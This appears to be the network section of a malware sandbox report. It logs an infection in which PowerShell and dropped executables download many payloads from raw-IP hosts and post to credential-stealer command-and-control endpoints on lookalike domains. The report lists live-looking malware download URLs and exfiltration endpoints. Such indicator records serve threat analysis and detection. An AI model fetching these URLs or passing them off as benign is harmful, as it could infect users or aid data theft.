  X-Frame-Options: SAMEORIGIN
  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Cache-Control: no-cache
  Date: Thu, 20 Feb 2025 00:34:58 GMT
  Content-Length: 29488
  Connection: keep-alive
  Set-Cookie: sessionid=1ecb631464e5cc2005adb6ca; Path=/; Secure; SameSite=None
  Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
• 150.171.28.10:443; https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=; tls, http2; 2.0kB; 9.4kB; 22; 19
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
  HTTP Response: 204
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
  HTTP Response: 204
  HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=00851a9fda1445fca7ea54edf0c58316&localId=w:7A7CDDEC-10AD-70C3-CBA3-32B71A66CD90&deviceId=6755478849407355&anid=
  HTTP Response: 204
• 2.18.27.82:443; https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90; tls, http2; 1.6kB; 7.3kB; 18; 14
  HTTP Request: GET https://www.bing.com/th?id=OADD2.10239414284817_1UVYYSBXC4CID8KBL&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
  HTTP Response: 200
• 185.215.113.16:80; http://185.215.113.16/mine/random.exe; http; powershell.exe; 57.9kB; 2.2MB; 1115; 1580
  HTTP Request: GET http://185.215.113.16/mine/random.exe
  HTTP Response: 200
• 185.215.113.43:80; http://185.215.113.43/Zu7JuNko/index.php; http; skotes.exe; 8.1kB; 10.5kB; 62; 42
  HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
  HTTP Response: 200
  (this POST/200 exchange is recorded 25 times in succession)
  HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.43/Zu7JuNko/index.php

                                                                                              HTTP Response

                                                                                              200
• 185.215.113.75:80
  URL: http://185.215.113.75/files/5996006993/dzvh4HC.exe
  Protocol: http
  Process: skotes.exe
  Sent: 1.4MB (29543 packets), Received: 58.4MB (41819 packets)
  HTTP requests (request -> response status):
    GET http://185.215.113.75/files/748049926/kdMujZh.exe -> 200
    GET http://185.215.113.75/files/teamex_support/random.exe -> 200
    GET http://185.215.113.75/files/SQL_gulong1/random.exe -> 200
    GET http://185.215.113.75/files/smirnov2626/random.exe -> 200
    GET http://185.215.113.75/files/martin1/random.exe -> 200
    GET http://185.215.113.75/files/bonus_max/random.exe -> 200
    GET http://185.215.113.75/files/5728215906/d2YQIJa.exe -> 200
    GET http://185.215.113.75/files/1760365699/f3Ypd8O.exe -> 200
    GET http://185.215.113.75/files/5803047068/oKUl4yo.exe -> 404
    GET http://185.215.113.75/files/7098980627/7aencsM.exe -> 200
    GET http://185.215.113.75/files/1506757897/tYliuwV.ps1 -> 200
    GET http://185.215.113.75/files/7708303768/9aiiMOQ.exe -> 200
    GET http://185.215.113.75/files/osint1618/random.exe -> 200
    GET http://185.215.113.75/files/5803047068/ymy1CwP.exe -> 200
    GET http://185.215.113.75/files/ReverseSheller/random.exe -> 200
    GET http://185.215.113.75/files/asjduwgsgausi/random.exe -> 200
    GET http://185.215.113.75/files/martin2/random.exe -> 200
    GET http://185.215.113.75/files/5996006993/dzvh4HC.exe -> 200
• 104.21.96.1:443
  URL: https://hoyoverse.blog/api
  Protocol: tls, http
  Process: 8827e2f2e3.exe
  Sent: 3.9kB (20 packets), Received: 11.8kB (22 packets)
  HTTP requests (request -> response status):
    POST https://hoyoverse.blog/api -> 403
    POST https://hoyoverse.blog/api -> 200
    POST https://hoyoverse.blog/api -> 200
• 104.21.96.1:443
  URL: https://hoyoverse.blog/api
  Protocol: tls, http
  Process: 8827e2f2e3.exe
  Sent: 2.3kB (11 packets), Received: 4.9kB (10 packets)
  HTTP requests (request -> response status):
    POST https://hoyoverse.blog/api -> 200
• 185.215.113.16:80
  URL: http://185.215.113.16/test/amnew.exe
  Protocol: http
  Process: skotes.exe
  Sent: 239.5kB (5030 packets), Received: 7.2MB (5172 packets)
  HTTP requests (request -> response status):
    GET http://185.215.113.16/testdef/random.exe -> 200
    GET http://185.215.113.16/test/am_no.bat -> 200
    GET http://185.215.113.16/luma/random.exe -> 200
    GET http://185.215.113.16/steam/random.exe -> 200
    GET http://185.215.113.16/well/random.exe -> 200
    GET http://185.215.113.16/test/exe/random.exe -> 200
    GET http://185.215.113.16/test/amnew.exe -> 200
• 104.21.96.1:443
  URL: https://hoyoverse.blog/api
  Protocol: tls, http
  Process: 8827e2f2e3.exe
  Sent: 1.4kB (11 packets), Received: 5.2kB (10 packets)
  HTTP requests (request -> response status):
    POST https://hoyoverse.blog/api -> 200
• 185.215.113.16:80
  URL: http://185.215.113.16/defend/random.exe
  Protocol: http
  Process: powershell.exe
  Sent: 40.6kB (830 packets), Received: 1.8MB (1258 packets)
  HTTP requests (request -> response status):
    GET http://185.215.113.16/defend/random.exe -> 200
• 103.84.89.222:33791
  URL: http://103.84.89.222:33791/
  Protocol: http
  Process: 0f807048bd.exe
  Sent: 43.9MB (31536 packets), Received: 777.4kB (17189 packets)
  HTTP requests (request -> response status):
    POST http://103.84.89.222:33791/ -> 200
    POST http://103.84.89.222:33791/ -> 200
    POST http://103.84.89.222:33791/ -> 200
    POST http://103.84.89.222:33791/
• 185.215.113.16:80
  URL: http://185.215.113.16/mine/random.exe
  Protocol: http
  Process: powershell.exe
  Sent: 52.8kB (1029 packets), Received: 2.2MB (1575 packets)
  HTTP requests (request -> response status):
    GET http://185.215.113.16/mine/random.exe -> 200
• 104.26.12.31:443
  URL: https://api.ip.sb/geoip
  Protocol: tls, http
  Process: 0f807048bd.exe
  Sent: 759 B (9 packets), Received: 4.7kB (9 packets)
  HTTP requests (request -> response status):
    GET https://api.ip.sb/geoip -> 200
• 52.22.198.150:443
  Host: httpbin.org
  Protocol: tls
  Process: 90ced29b15.exe
  Sent: 1.5kB (14 packets), Received: 6.4kB (15 packets)
• 185.72.145.179:80
  URL: http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
  Protocol: http
  Process: 90ced29b15.exe
  Sent: 463.2kB (338 packets), Received: 7.1kB (174 packets)
  HTTP requests (request -> response status):
    POST http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006 -> 200
• 104.21.16.1:443
  URL: https://stormlegue.com/api
  Protocol: tls, http
  Process: 40e0b6ad21.exe
  Sent: 3.9kB (19 packets), Received: 12.0kB (20 packets)
  HTTP requests (request -> response status):
    POST https://stormlegue.com/api -> 403
    POST https://stormlegue.com/api -> 200
    POST https://stormlegue.com/api -> 200
• 185.72.145.179:80
  URL: http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607
  Protocol: http
  Process: 90ced29b15.exe
  Sent: 201.5kB (4260 packets), Received: 11.1MB (7976 packets)
  HTTP requests (request -> response status):
    GET http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006?argument=CMFIEukv9P2cH9cA1740011607 -> 200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              40e0b6ad21.exe
                                                                                              2.2kB
                                                                                              5.1kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              40e0b6ad21.exe
                                                                                              1.2kB
                                                                                              5.1kB
                                                                                              9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              3.9kB
                                                                                              12.0kB
                                                                                              19
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              2.3kB
                                                                                              5.2kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              d2YQIJa.exe
                                                                                              1.2kB
                                                                                              5.1kB
                                                                                              9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              3.9kB
                                                                                              11.8kB
                                                                                              19
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              2.2kB
                                                                                              4.9kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.86.17:443
                                                                                              https://pasteflawwed.world/api
                                                                                              tls, http
                                                                                              f3Ypd8O.exe
                                                                                              1.2kB
                                                                                              4.8kB
                                                                                              9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://pasteflawwed.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              861 B
                                                                                              2.7kB
                                                                                              11
                                                                                              8

                                                                                              HTTP Request

                                                                                              GET https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                              622 B
                                                                                              9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.4kB
                                                                                              2.8kB
                                                                                              10
                                                                                              7

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.5kB
                                                                                              6.5kB
                                                                                              13
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                              672 B
                                                                                              9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              5.9kB
                                                                                              605 B
                                                                                              13
                                                                                              7

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.3kB
                                                                                              558 B
                                                                                              9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 5.75.210.149:443
                                                                                              https://5.75.210.149/
                                                                                              tls, http
                                                                                              7aencsM.exe
                                                                                              1.5kB
                                                                                              565 B
                                                                                              9
                                                                                              6

                                                                                              HTTP Request

                                                                                              POST https://5.75.210.149/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.72.145.179:80
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              http
                                                                                              90ced29b15.exe
                                                                                              874 B
                                                                                              387 B
                                                                                              5
                                                                                              3

                                                                                              HTTP Request

                                                                                              POST http://fivenn5sr.top/v1/upload.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 172.217.169.78:443
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.9kB
                                                                                              9.3kB
                                                                                              13
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                            • 142.250.200.4:443
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              3.1kB
                                                                                              45.2kB
                                                                                              42
                                                                                              44

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/ddljson?async=ntp:2

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_promos
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              980 B
                                                                                              4.6kB
                                                                                              9
                                                                                              7
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                              4.6kB
                                                                                              9
                                                                                              7
                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                              5.9kB
                                                                                              8
                                                                                              7
Flows (fields in order: destination, host/URL, protocol, process, bytes sent, bytes received, packets sent, packets received; fields missing in the report are omitted; HTTP exchanges listed as request -> response status):

• 185.72.145.179:80 | http://fivenn5sr.top/v1/upload.php | http | 90ced29b15.exe | 74.1kB | 627 B | 57 | 9
  HTTP: POST http://fivenn5sr.top/v1/upload.php -> 200
• 142.250.178.14:443 | play.google.com | tls, http2 | chrome.exe | 961 B | 7.5kB | 8 | 8
• 142.250.178.14:443 | play.google.com | tls, http2 | chrome.exe | 961 B | 7.5kB | 8 | 8
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 9aiiMOQ.exe | 3.9kB | 11.8kB | 19 | 21
  HTTP: POST https://pasteflawwed.world/api -> 403
  HTTP: POST https://pasteflawwed.world/api -> 200
  HTTP: POST https://pasteflawwed.world/api -> 200
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 9aiiMOQ.exe | 2.2kB | 4.9kB | 10 | 10
  HTTP: POST https://pasteflawwed.world/api -> 200
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 9aiiMOQ.exe | 1.2kB | 4.8kB | 9 | 9
  HTTP: POST https://pasteflawwed.world/api -> 200
• 20.112.250.133:80 | microsoft.com | powershell.exe | 190 B | 92 B | 4 | 2
• 52.101.8.49:25 | microsoft-com.mail.protection.outlook.com | powershell.exe | 260 B | 5
• 127.0.0.1:9222 | 90ced29b15.exe
• 127.0.0.1:9223 | 7aencsM.exe
• 127.0.0.1:9223 | 7aencsM.exe
• 5.75.210.149:443 | https://5.75.210.149/ | tls, http | 7aencsM.exe | 2.2kB | 565 B | 10 | 6
  HTTP: POST https://5.75.210.149/ -> 200
• 104.82.234.109:443 | https://steamcommunity.com/profiles/76561199822375128 | tls, http | 198cfc7201.exe | 1.6kB | 43.4kB | 22 | 37
  HTTP: GET https://steamcommunity.com/profiles/76561199822375128 -> 200
• 5.75.210.149:443 | https://5.75.210.149/ | tls, http | 7aencsM.exe | 226.8kB | 3.9kB | 170 | 90
  HTTP: POST https://5.75.210.149/ -> 200
• 104.21.63.231:443 | https://bloodyeleftor.world/api | tls, http | 198cfc7201.exe | 3.9kB | 11.7kB | 19 | 20
  HTTP: POST https://bloodyeleftor.world/api -> 403
  HTTP: POST https://bloodyeleftor.world/api -> 200
  HTTP: POST https://bloodyeleftor.world/api -> 200
• 2.59.161.190:443 | vanaheim.cn | https | powershell.exe | 401 B | 582 B | 6 | 6
• 5.75.210.149:443 | https://5.75.210.149/ | tls, http | 7aencsM.exe | 57.8kB | 928 B | 50 | 15
  HTTP: POST https://5.75.210.149/ -> 200
• 104.21.63.231:443 | https://bloodyeleftor.world/api | tls, http | 198cfc7201.exe | 2.2kB | 4.9kB | 10 | 10
  HTTP: POST https://bloodyeleftor.world/api -> 200
• 185.7.214.57:481 | powershell.exe | 14.6kB | 576.2kB | 291 | 423
• 104.21.63.231:443 | https://bloodyeleftor.world/api | tls, http | 198cfc7201.exe | 1.2kB | 4.8kB | 9 | 9
  HTTP: POST https://bloodyeleftor.world/api -> 200
• 185.7.214.57:481 | powershell.exe | 2.4kB | 991 B | 13 | 16
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 6ccbdd7074.exe | 4.5kB | 11.9kB | 21 | 24
  HTTP: POST https://pasteflawwed.world/api -> 403
  HTTP: POST https://pasteflawwed.world/api -> 200
  HTTP: POST https://pasteflawwed.world/api -> 200
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 6ccbdd7074.exe | 2.2kB | 4.9kB | 10 | 10
  HTTP: POST https://pasteflawwed.world/api -> 200
• 104.21.86.17:443 | https://pasteflawwed.world/api | tls, http | 6ccbdd7074.exe | 1.2kB | 4.8kB | 9 | 9
  HTTP: POST https://pasteflawwed.world/api -> 200
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 185.7.214.57:481 | powershell.exe | 2.1kB | 911 B | 11 | 14
• 127.0.0.1:9222 | 90ced29b15.exe
• 185.215.113.115:80 | http://185.215.113.115/68b591d6548ec281/sqlite3.dll | http | ee1401f004.exe | 46.9kB | 1.2MB | 849 | 843
  HTTP: GET http://185.215.113.115/ -> 200
  HTTP: POST http://185.215.113.115/c4becf79229cb002.php -> 200
  HTTP: POST http://185.215.113.115/c4becf79229cb002.php -> 200
  HTTP: POST http://185.215.113.115/c4becf79229cb002.php -> 200
  HTTP: POST http://185.215.113.115/c4becf79229cb002.php -> 200
  HTTP: POST http://185.215.113.115/c4becf79229cb002.php -> 200
  HTTP: GET http://185.215.113.115/68b591d6548ec281/sqlite3.dll -> 200
• 185.7.214.57:481 | powershell.exe | 2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.147.125.145:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                              1.2kB
                                                                                              10
                                                                                              12
                                                                                            • 185.243.96.115:425
                                                                                              powershell.exe
                                                                                              51.5kB
                                                                                              9.8kB
                                                                                              82
                                                                                              74
                                                                                            • 185.147.125.146:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                              1.2kB
                                                                                              10
                                                                                              12
                                                                                            • 193.143.1.5:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                              1.2kB
                                                                                              10
                                                                                              12
                                                                                            • 185.147.125.147:425
                                                                                              powershell.exe
                                                                                              21.5kB
                                                                                              4.0kB
                                                                                              43
                                                                                              39
                                                                                            • 185.42.12.45:425
                                                                                              powershell.exe
                                                                                              3.1kB
                                                                                              1.2kB
                                                                                              10
                                                                                              12
                                                                                            • 185.7.214.51:425
                                                                                              powershell.exe
                                                                                              12.2kB
                                                                                              2.9kB
                                                                                              26
                                                                                              27
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              643 B
                                                                                              2.8kB
                                                                                              6
                                                                                              5

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.3kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 172.217.169.78:443
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              2.0kB
                                                                                              9.3kB
                                                                                              13
                                                                                              16

                                                                                              HTTP Request

                                                                                              GET https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              951 B
                                                                                              12
                                                                                              15
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              1.1kB
                                                                                              5.5kB
                                                                                              9
                                                                                              8
                                                                                            • 142.250.200.4:443
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              3.0kB
                                                                                              45.2kB
                                                                                              40
                                                                                              46

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/ddljson?async=ntp:2

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                                                                              HTTP Request

                                                                                              GET https://www.google.com/async/newtab_promos
                                                                                            • 142.250.200.4:443
                                                                                              www.google.com
                                                                                              tls
                                                                                              chrome.exe
                                                                                              1.0kB
                                                                                              4.6kB
                                                                                              9
                                                                                              7
                                                                                            • 142.250.178.10:443
                                                                                              ogads-pa.googleapis.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              953 B
                                                                                              5.9kB
                                                                                              8
                                                                                              7
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              943 B
                                                                                              7.5kB
                                                                                              8
                                                                                              8
                                                                                            • 142.250.178.14:443
                                                                                              play.google.com
                                                                                              tls, http2
                                                                                              chrome.exe
                                                                                              993 B
                                                                                              7.5kB
                                                                                              8
                                                                                              8
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.215.113.16:80
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              http
                                                                                              powershell.exe
                                                                                              43.5kB
                                                                                              2.2MB
                                                                                              816
                                                                                              1575

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.16/mine/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 67.195.204.73:25
                                                                                              mta6.am0.yahoodns.net
                                                                                              powershell.exe
                                                                                              260 B
                                                                                              5
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 142.250.179.238:443
                                                                                              https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
  tls, http2 | firefox.exe | sent 2.2kB, received 10.0kB | 16 pkts out, 21 pkts in
    HTTP request: GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
